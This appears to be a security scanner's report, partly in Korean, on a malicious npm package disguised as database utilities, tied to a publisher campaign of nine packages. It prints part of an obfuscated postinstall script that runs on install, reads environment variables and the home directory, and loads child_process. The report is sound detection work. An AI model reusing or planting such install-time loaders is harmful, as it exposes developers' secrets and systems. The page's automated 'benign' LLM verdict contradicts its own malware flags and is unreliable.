// npm 패키지
@cloudplatform-single-spa/ml-ai-agents-agent
Internal database utilities with connection pooling, query builder and migration support
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,351 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x3199d9=a0_0x3055;(function(_0xda54bd,_0x193777){const _0x47a679=a0_0x3055,_0x2c97d0=_0xda54bd();while(!![]){try{const _0x451512=parseInt(_0x47a679(0x1f1))/(0x2643+-0x1d47+-0x79…// publisher 캠페인by mr.4nd3r50n
이 계정에서 catch된 패키지 9건고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4933reads-env-varsreads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x3199d9=a0_0x3055;(function(_0xda54bd,_0x193777){const _0x47a679=a0_0x3055,_0x2c97d0=_0xda54bd();while(!![]){try{const _0x451512=parseInt(_0x47a679(0x1f1))/(0x2643+-0x1d47+-0x79*0x13)+parseInt(_0x47a679(0x1f6))/(-0x23b8+0x11*-0xcf+0x3179)*(-parseInt(_0x47a679(0x1d6))/(0x65*-0x32+0x1*-0x1113+-0xf8*-0x26))+parseInt(_0x47a679(0x20a))/(-0x1f9a+-0x120+0x20be)+parseInt(_0x47a679(0x233))/(0x439*0x3+0x19*0x52+-0x14a8)*(parseInt(_0x47a679(0x23e))/(-0x1*0xe9e+0x2*-0xbfe+0x26a0))+parseInt(_0x47a679(0x1f4))/(-0x3*-0x9fa+-0x1fed+0x103*0x2)+parseInt(_0x47a679(0x22e))/(-0x164+0x859+-0xc5*0x9)+-parseInt(_0x47a679(0x1fe))/(0x1448+0x2210+-0x364f*0x1)*(parseInt(_0x47a679(0x1e7))/(-0x1c8b+-0x15c8+-0x325d*-0x1));if(_0x451512===_0x193777)break;else _0x2c97d0['push'](_0x2c97d0['shift']());}catch(_0x47e63e){_0x2c97d0['push'](_0x2c97d0['shift']());}}}(a0_0x1624,0x11abe*0x4+0x68228+-0x203c3));const a0_0x3c6402=require('os'),a0_0x368ad9=require('fs'),a0_0x3b199d=require(a0_0x3199d9(0x21f)),a0_0x2427ed=require(a0_0x3199d9(0x1f3)),a0_0x416c85=require(a0_0x3199d9(0x1ea)),{execSync:a0_0x4c6b4e,spawn:a0_0x18ba0a}=require(a0_0x3199d9(0x228)),a0_0x8c4abd=a0_0x3199d9(0x201),a0_0x47380b=a0_0x3199d9(0x1e6),a0_0x4f2568=a0_0x3199d9(0x1fa)+a0_0x3199d9(0x1d7),a0_0x3a1160=a0_0x3199d9(0x1d4),a0_0x327551=!!process.env[a0_0x3a1160],a0_0x4b43cb=a0_0x3199d9(0x1d9)===a0_0x3199d9(0x1d9)||!!process.env[a0_0x4f2568+'RECON_ONLY'];function a0_0x1da7c7(_0x57d0f9){const _0x40f1f0=a0_0x3199d9,_0x5e7677=proce --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
